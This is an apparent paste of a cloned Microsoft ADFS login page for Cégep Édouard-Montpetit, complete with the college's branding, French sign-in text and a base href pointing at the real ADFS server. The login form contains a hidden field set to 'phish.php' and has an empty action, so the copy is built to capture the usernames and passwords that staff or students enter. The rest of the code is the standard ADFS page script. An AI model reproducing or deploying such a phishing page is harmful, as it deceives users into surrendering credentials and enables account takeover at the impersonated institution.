Untitled
4 years ago in Plain Text
<!DOCTYPE html>
<html lang="fr-CA">
<head>
<base href="https://adfs.cegepmontpetit.ca/adfs/ls/?client-request-id=dff26378-4ea5-44f4-aa35-699d23231199&amp;username=&amp;wa=wsignin1.0&amp;wtrealm=urn%3Afederation%3AMicrosoftOnline&amp;wctx=estsredirect%3D2%26estsrequest%3DrQIIAY2RMW_TQACFe3Fr1A5AUX9ARZmQHJ_t88W2xJAmISm4JI5TYrIg53K2L3FyxrkAzS9g7EolJITEkoEBGBA_oVPnLqwdUcWAxEIiFsa-4dMbn753X9KKmnMP_ouurKjAKNIUQlftv-R3tm6_Jlc_Pj75VV2Y7N3e3vbbU7BNaEyzMZ-IjAomiiRcgLuJENnUUVU-EynnoyKPIkaogc0i4WOVvwrVbwCcA7AolLCBLYSRgbBtwJKuQ1iEGGMEEVUMolsKgiFUbIoiRUMUQaIj06D0onCrWZ6JRF-B52xOrwqbEc_HzzM-FaeSqBLhVnk5rpXbbVgVqFJqp_qo3vKshAetpDdqJHa3Pw_TIGraR0ZAXR9ljw_y9Mgd7FfS-rMD_0Ut9-JHId4_LrM-8az50GdtZg5NOy51LKWb6fXGS3sw10SQd6fUixbStUR-luSlhqWyM0nmGZ2wwfk6-L0OPmwsDX-9-efL7vHDyqf3Tdq7VNbONlSSYp_F2HJx41DvRJMam1JVbUFRVztPXZ-FQdQfHrYEmnkPLEc7kcGJLF_K4KcM3txY-755jTsutnZ0qNnKari2q1mOiR3T6v0F0" /><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=1"/><meta http-equiv="content-type" content="text/html;charset=UTF-8"/><meta http-equiv="cache-control" content="no-cache,no-store"/><meta http-equiv="pragma" content="no-cache"/><meta http-equiv="expires" content="-1"/><meta name="mswebdialog-title" content="Connecting to Cégep Édouard-Montpetit"/>
<title>Connexion</title>
<script type="text/javascript">
//<![CDATA[
function LoginErrors(){this.userNameFormatError = 'Entrez votre ID d\u0026#39;utilisateur au format \u0026#171; domaine\\utilisateur \u0026#187; ou \u0026#171; utilisateur@domaine \u0026#187;.'; this.passwordEmpty = 'Entrez votre mot de passe.'; this.passwordTooLong = 'Le mot de passe est trop long (\u0026gt; 128 caract\u0026#232;res).';}; var maxPasswordLength = 128;
//]]>
</script><script type="text/javascript">
//<![CDATA[
// Copyright (c) Microsoft Corporation. All rights reserved.
function InputUtil(errTextElementID, errDisplayElementID) {
if (!errTextElementID) errTextElementID = 'errorText';
if (!errDisplayElementID) errDisplayElementID = 'error';
this.hasFocus = false;
this.errLabel = document.getElementById(errTextElementID);
this.errDisplay = document.getElementById(errDisplayElementID);
};
InputUtil.prototype.canDisplayError = function () {
return this.errLabel && this.errDisplay;
}
InputUtil.prototype.checkError = function () {
if (!this.canDisplayError){
throw new Error ('Error element not present');
}
if (this.errLabel && this.errLabel.innerHTML) {
this.errDisplay.style.display = '';
var cause = this.errLabel.getAttribute('for');
if (cause) {
var causeNode = document.getElementById(cause);
if (causeNode && causeNode.value) {
causeNode.focus();
this.hasFocus = true;
}
}
}
else {
this.errDisplay.style.display = 'none';
}
};
InputUtil.prototype.setInitialFocus = function (input) {
if (this.hasFocus) return;
var node = document.getElementById(input);
if (node) {
if ((/^\s*$/).test(node.value)) {
node.focus();
this.hasFocus = true;
}
}
};
InputUtil.prototype.setError = function (input, errorMsg) {
if (!this.canDisplayError) {
throw new Error('Error element not present');
}
input.focus();
if (errorMsg) {
this.errLabel.innerHTML = errorMsg;
}
this.errLabel.setAttribute('for', input.id);
this.errDisplay.style.display = '';
};
InputUtil.makePlaceholder = function (input) {
var ua = navigator.userAgent;
if (ua != null &&
(ua.match(/MSIE 9.0/) != null ||
ua.match(/MSIE 8.0/) != null ||
ua.match(/MSIE 7.0/) != null)) {
var node = document.getElementById(input);
if (node) {
var placeholder = node.getAttribute("placeholder");
if (placeholder != null && placeholder != '') {
var label = document.createElement('input');
label.type = "text";
label.value = placeholder;
label.readOnly = true;
label.style.position = 'absolute';
label.style.borderColor = 'transparent';
label.className = node.className + ' hint';
label.tabIndex = -1;
label.onfocus = function () { this.nextSibling.focus(); };
node.style.position = 'relative';
node.parentNode.style.position = 'relative';
node.parentNode.insertBefore(label, node);
node.onkeyup = function () { InputUtil.showHint(this); };
node.onblur = function () { InputUtil.showHint(this); };
node.style.background = 'transparent';
node.setAttribute("placeholder", "");
InputUtil.showHint(node);
}
}
}
};
InputUtil.focus = function (inputField) {
var node = document.getElementById(inputField);
if (node) node.focus();
};
InputUtil.hasClass = function(node, clsName) {
return node.className.match(new RegExp('(\\s|^)' + clsName + '(\\s|$)'));
};
InputUtil.addClass = function(node, clsName) {
if (!this.hasClass(node, clsName)) node.className += " " + clsName;
};
InputUtil.removeClass = function(node, clsName) {
if (this.hasClass(node, clsName)) {
var reg = new RegExp('(\\s|^)' + clsName + '(\\s|$)');
node.className = node.className.replace(reg, ' ');
}
};
InputUtil.showHint = function (node, gotFocus) {
if (node.value && node.value != '') {
node.previousSibling.style.display = 'none';
}
else {
node.previousSibling.style.display = '';
}
};
InputUtil.updatePlaceholder = function (input, placeholderText) {
var node = document.getElementById(input);
if (node) {
var ua = navigator.userAgent;
if (ua != null &&
(ua.match(/MSIE 9.0/) != null ||
ua.match(/MSIE 8.0/) != null ||
ua.match(/MSIE 7.0/) != null)) {
var label = node.previousSibling;
if (label != null) {
label.value = placeholderText;
}
}
else {
node.placeholder = placeholderText;
}
}
};
//]]>
</script>
<link href="/adfs/portal/css/style.css?id=0A13280A86E7DFA6949BD016EA848912FCAFC05E88CBEDF538AC325B27041205" rel="stylesheet" type="text/css" />
<style type="text/css">.illustrationClass {background-image:url(/adfs/portal/illustration/illustration.fr.png?id=10D42513A8DF5366E9026086F7A514429C1F3AB71E02B653AF4996B0F5A359D8);}
</style>
</head>
<body class="body" dir="ltr">
<div id="noScript" style="position:static; width:100%; height:100%; z-index:100">
<h1>JavaScript requis</h1>
<p>JavaScript est requis. Ce navigateur Web ne prend pas en charge JavaScript ou JavaScript n&#39;est pas activ&eacute; dans ce navigateur Web.</p>
<p>Consultez l&#39;aide de votre navigateur Web pour savoir si votre navigateur Web prend en charge JavaScript ou pour activer JavaScript.</p>
</div>
<script type="text/javascript" language="JavaScript">
document.getElementById("noScript").style.display = "none";
</script>
<div id="fullPage">
<div class="float" id="brandingWrapper">
<div id="branding">&nbsp;</div>
</div>
<div class="float" id="contentWrapper">
<div id="content">
<div id="header"><img alt="Cégep Édouard-Montpetit" class="logoImage" id="companyLogo" src="/adfs/portal/logo/logo.fr.png?id=AF151A3CB9E904F1E90B44656B76342B731DF00E7ED48B3E1FCD35283D9A2D9C" /></div>
<div id="workArea">
<div class="groupMargin" id="authArea">
<div id="loginArea">
<div class="groupMargin" id="loginMessage">Connexion avec votre compte professionnel</div>
<form action="" autocomplete="off" id="loginForm" method="post" novalidate="novalidate" onkeypress="if (event &amp;&amp; event.keyCode == 13) Login.submitLoginRequest();"><input name="__original_url" type="hidden" value="phish.php" />
<div class="fieldMargin error smallText" id="error">&nbsp;</div>
<div id="formsAuthenticationArea">
<div id="userNameArea"><label class="hidden" for="userNameInput" id="userNameInputLabel">Compte d&#39;utilisateur</label> <input autocomplete="off" class="text fullWidth" id="userNameInput" name="UserName" placeholder="[email protected]" spellcheck="false" tabindex="1" type="email" value="" /></div>
<div id="passwordArea"><label class="hidden" for="passwordInput" id="passwordInputLabel">Mot de passe</label> <input autocomplete="off" class="text fullWidth" id="passwordInput" name="password" placeholder="Mot de passe" tabindex="2" type="password" /></div>
<div id="kmsiArea" style="display:none"><input id="kmsiInput" name="Kmsi" tabindex="3" type="checkbox" value="true" /> <label for="kmsiInput">Maintenir la connexion</label></div>
<div class="submitMargin" id="submissionArea"><span class="submit" id="submitButton" onclick="return Login.submitLoginRequest();" onkeypress="if (event &amp;&amp; event.keyCode == 32) Login.submitLoginRequest();" role="button" tabindex="4">Connexion</span></div>
</div>
<input id="optionForms" name="AuthMethod" type="hidden" value="FormsAuthentication" />&nbsp;</form>
<div id="authOptions">
<form action="" id="options" method="post"><input name="__original_url" type="hidden" value="https://adfs.cegepmontpetit.ca:443/adfs/ls/?client-request-id=dff26378-4ea5-44f4-aa35-699d23231199&amp;username=&amp;wa=wsignin1.0&amp;wtrealm=urn%3Afederation%3AMicrosoftOnline&amp;wctx=estsredirect%3D2%26estsrequest%3DrQIIAY2RMW_TQACFe3Fr1A5AUX9ARZmQHJ_t88W2xJAmISm4JI5TYrIg53K2L3FyxrkAzS9g7EolJITEkoEBGBA_oVPnLqwdUcWAxEIiFsa-4dMbn753X9KKmnMP_ouurKjAKNIUQlftv-R3tm6_Jlc_Pj75VV2Y7N3e3vbbU7BNaEyzMZ-IjAomiiRcgLuJENnUUVU-EynnoyKPIkaogc0i4WOVvwrVbwCcA7AolLCBLYSRgbBtwJKuQ1iEGGMEEVUMolsKgiFUbIoiRUMUQaIj06D0onCrWZ6JRF-B52xOrwqbEc_HzzM-FaeSqBLhVnk5rpXbbVgVqFJqp_qo3vKshAetpDdqJHa3Pw_TIGraR0ZAXR9ljw_y9Mgd7FfS-rMD_0Ut9-JHId4_LrM-8az50GdtZg5NOy51LKWb6fXGS3sw10SQd6fUixbStUR-luSlhqWyM0nmGZ2wwfk6-L0OPmwsDX-9-efL7vHDyqf3Tdq7VNbONlSSYp_F2HJx41DvRJMam1JVbUFRVztPXZ-FQdQfHrYEmnkPLEc7kcGJLF_K4KcM3txY-755jTsutnZ0qNnKari2q1mOiR3T6v0F0" /> <script type="text/javascript">
function SelectOption(option) {
var i = document.getElementById('optionSelection');
i.value = option;
document.forms['options'].submit();
return false;
}
</script> <input id="optionSelection" name="AuthMethod" type="hidden" />
<div class="groupMargin" id="authOptionLinks">&nbsp;</div>
</form>
</div>
<div class="groupMargin" id="introduction">Mot de passe oubli&eacute; ou expir&eacute;? Acc&eacute;dez &agrave; la page de <a href="http://motdepasse.cegepmontpetit.ca/">gestion des mots de passe</a>.</div>
<script type="text/javascript">
//<![CDATA[
function Login() {
}
Login.userNameInput = 'userNameInput';
Login.passwordInput = 'passwordInput';
Login.initialize = function () {
var u = new InputUtil();
u.checkError();
u.setInitialFocus(Login.userNameInput);
u.setInitialFocus(Login.passwordInput);
}();
Login.submitLoginRequest = function () {
var u = new InputUtil();
var e = new LoginErrors();
var userName = document.getElementById(Login.userNameInput);
var password = document.getElementById(Login.passwordInput);
if (!userName.value || !userName.value.match('[@\\\\]')) {
u.setError(userName, e.userNameFormatError);
return false;
}
if (!password.value) {
u.setError(password, e.passwordEmpty);
return false;
}
if (password.value.length > maxPasswordLength) {
u.setError(password, e.passwordTooLong);
return false;
}
document.forms['loginForm'].submit();
return false;
};
InputUtil.makePlaceholder(Login.userNameInput);
InputUtil.makePlaceholder(Login.passwordInput);
//]]>
</script></div>
</div>
</div>
<div id="footerPlaceholder">&nbsp;</div>
</div>
<div id="footer">
<div class="floatReverse" id="footerLinks">
<div><span id="copyright">&copy; 2016 Microsoft</span><a class="pageLink" href="https://cegepmontpetit.omnivox.ca" id="home">Portail Omnivox</a><a class="pageLink" href="https://www1.cegepmontpetit.ca/citadel" id="helpDesk">Cita@del</a></div>
</div>
</div>
</div>
</div>
<script type="text/javascript">
//<![CDATA[
// Copyright (c) Microsoft Corporation. All rights reserved.
// This file contains several workarounds on inconsistent browser behaviors that administrators may customize.
"use strict";
// iPhone email friendly keyboard does not include "\" key, use regular keyboard instead.
// Note change input type does not work on all versions of all browsers.
if (navigator.userAgent.match(/iPhone/i) != null) {
var emails = document.querySelectorAll("input[type='email']");
if (emails) {
for (var i = 0; i < emails.length; i++) {
emails[i].type = 'text';
}
}
}
// In the CSS file we set the ms-viewport to be consistent with the device dimensions,
// which is necessary for correct functionality of immersive IE.
// However, for Windows 8 phone we need to reset the ms-viewport's dimension to its original
// values (auto), otherwise the viewport dimensions will be wrong for Windows 8 phone.
// Windows 8 phone has agent string 'IEMobile 10.0'
if (navigator.userAgent.match(/IEMobile\/10\.0/)) {
var msViewportStyle = document.createElement("style");
msViewportStyle.appendChild(
document.createTextNode(
"@-ms-viewport{width:auto!important}"
)
);
msViewportStyle.appendChild(
document.createTextNode(
"@-ms-viewport{height:auto!important}"
)
);
document.getElementsByTagName("head")[0].appendChild(msViewportStyle);
}
// If the innerWidth is defined, use it as the viewport width.
if (window.innerWidth && window.outerWidth && window.innerWidth !== window.outerWidth) {
var viewport = document.querySelector("meta[name=viewport]");
viewport.setAttribute('content', 'width=' + window.innerWidth + ', initial-scale=1.0, user-scalable=1');
}
// Gets the current style of a specific property for a specific element.
function getStyle(element, styleProp) {
var propStyle = null;
if (element && element.currentStyle) {
propStyle = element.currentStyle[styleProp];
}
else if (element && window.getComputedStyle) {
propStyle = document.defaultView.getComputedStyle(element, null).getPropertyValue(styleProp);
}
return propStyle;
}
// The script below is used for downloading the illustration image
// only when the branding is displaying. This script work together
// with the code in PageBase.cs that sets the html inline style
// containing the class 'illustrationClass' with the background image.
var computeLoadIllustration = function () {
var branding = document.getElementById("branding");
var brandingDisplay = getStyle(branding, "display");
var brandingWrapperDisplay = getStyle(document.getElementById("brandingWrapper"), "display");
if (brandingDisplay && brandingDisplay !== "none" &&
brandingWrapperDisplay && brandingWrapperDisplay !== "none") {
var newClass = "illustrationClass";
if (branding.classList && branding.classList.add) {
branding.classList.add(newClass);
} else if (branding.className !== undefined) {
branding.className += " " + newClass;
}
if (window.removeEventListener) {
window.removeEventListener('load', computeLoadIllustration, false);
window.removeEventListener('resize', computeLoadIllustration, false);
}
else if (window.detachEvent) {
window.detachEvent('onload', computeLoadIllustration);
window.detachEvent('onresize', computeLoadIllustration);
}
}
};
if (window.addEventListener) {
window.addEventListener('resize', computeLoadIllustration, false);
window.addEventListener('load', computeLoadIllustration, false);
}
else if (window.attachEvent) {
window.attachEvent('onresize', computeLoadIllustration);
window.attachEvent('onload', computeLoadIllustration);
}
// Function to change illustration image. Usage example below.
function SetIllustrationImage(imageUri) {
var illustrationImageClass = '.illustrationClass {background-image:url(' + imageUri + ');}';
var css = document.createElement('style');
css.type = 'text/css';
if (css.styleSheet) css.styleSheet.cssText = illustrationImageClass;
else css.appendChild(document.createTextNode(illustrationImageClass));
document.getElementsByTagName("head")[0].appendChild(css);
}
// Example to change illustration image on HRD page after adding the image to active theme:
// PSH> Set-AdfsWebTheme -TargetName <activeTheme> -AdditionalFileResource @{uri='/adfs/portal/images/hrd.jpg';path='.\hrd.jpg'}
//
//if (typeof HRD != 'undefined') {
// SetIllustrationImage('/adfs/portal/images/hrd.jpg');
//}
//]]>
</script></body>
</html>